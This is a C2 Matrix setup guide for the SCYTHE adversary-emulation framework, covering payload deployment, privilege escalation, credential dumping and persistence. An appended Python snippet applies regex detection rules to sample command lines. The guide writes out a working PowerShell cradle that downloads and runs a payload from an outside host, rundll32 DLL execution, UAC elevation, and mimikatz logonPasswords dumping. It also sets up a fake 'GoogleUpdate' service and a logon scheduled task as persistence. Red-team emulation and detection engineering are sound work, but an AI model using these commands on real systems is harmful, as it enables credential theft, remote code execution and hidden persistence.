C2 Matrix
SCYTHE

Setup Campaign

Log in to your SCYTHE instance via a web browser; the default port is 8443.
Campaign Manager - New Campaign
Select the following options:
  • Name: unique name for the campaign
  • Target Operating System: Windows, Linux, or macOS
  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date
  • Communication Module:
    • HTTPS is the default
    • DNS, HTTP, and Stego require relays to be installed on a redirector
    • Google Sheet and Twitter require a third-party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from the SCYTHE GitHub: https://github.com/scythe-io/community-threats
Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import
Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute it by double-clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download the DLL file from SCYTHE and run the following from cmd.exe:
rundll32.exe ServiceLogin.dll,PlatformClientMain

Command and Scripting Interpreter: PowerShell (T1059.001)

Open powershell.exe and run:
$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;

Emulate TTPs

loader --load run
run whoami
run cmd /c whoami

Load Python Runtime

loader --load-runtime python3
list modules
loader --load "modulename"
"modulename"

Download files

Move the file to the virtual file system:
loader --load downloader
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll

Privilege Escalation (TA0004)

UAC (T1088)

loader --load elevate
elevate --prompt

Credential Access (TA0006)

Credential Dumping (T1003)

loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords

Persistence (TA0003)

New Service (T1050)

loader --load persist

Syntax:
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"

Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe

Scheduled Task (T1168)

schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"
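The rundll32 deployment, the PowerShell download cradle and the scheduled-task persistence above are exactly the telemetry a purple team expects its sensors to catch when this campaign runs. As an added example that is not from the C2 Matrix page or from SCYTHE, this Python snippet runs simple command-line detection rules over constructed process-creation events modelled on those commands; the sample command lines and the regexes are assumptions, not a real sensor schema or vendor rule set.

```python
import re

# Constructed sample process command lines, modelled on the SCYTHE deployment and
# persistence commands on this page. Not real sensor data.
SAMPLE_CMDLINES = [
    "rundll32.exe ServiceLogin.dll,PlatformClientMain",
    "$wc=New-Object System.Net.WebClient;$wc.DownloadFile($url,$output);"
    "C:\\Users\\Public\\scythe_payload.exe",
    'schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe '
    'C:\\Users\\DNS_scythe_client32.dll,PlatformClientMain"',
    # Ordinary control-panel launch via rundll32: must not trigger anything.
    "rundll32.exe shell32.dll,Control_RunDLL",
]

# Detection rules: (description, technique id as written on this page, regex over the command line).
RULES = [
    ("rundll32 invoking the PlatformClientMain export of a DLL", "T1218.011",
     re.compile(r"rundll32(\.exe)?\s+\S+\.dll,PlatformClientMain", re.I)),
    ("PowerShell WebClient download cradle writing under C:\\Users\\Public", "T1059.001",
     re.compile(r"Net\.WebClient.*DownloadFile.*\\Users\\Public\\", re.I)),
    ("Scheduled task whose action runs a DLL export through rundll32", "T1168",
     re.compile(r'schtasks\s+/create.*/tr\s+".*rundll32.*\.dll,\w+', re.I)),
]

def classify(cmdline):
    """Return the (description, technique_id) pairs whose regex matches one command line."""
    return [(desc, tid) for desc, tid, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Run every rule over every command line; returns (event_index, technique_id) per hit."""
    return [(i, tid) for i, cl in enumerate(cmdlines) for _, tid in classify(cl)]

if __name__ == "__main__":
    for i, tid in scan(SAMPLE_CMDLINES):
        print(f"event {i}: {tid} - {SAMPLE_CMDLINES[i][:60]}")
```

The scheduled-task event matches two rules at once (the rundll32 export and the schtasks action), which is the overlap a detection engineer wants to see before tuning either rule away.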

Clean up

Persistence:

run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe

Kill agent:

controller --shutdown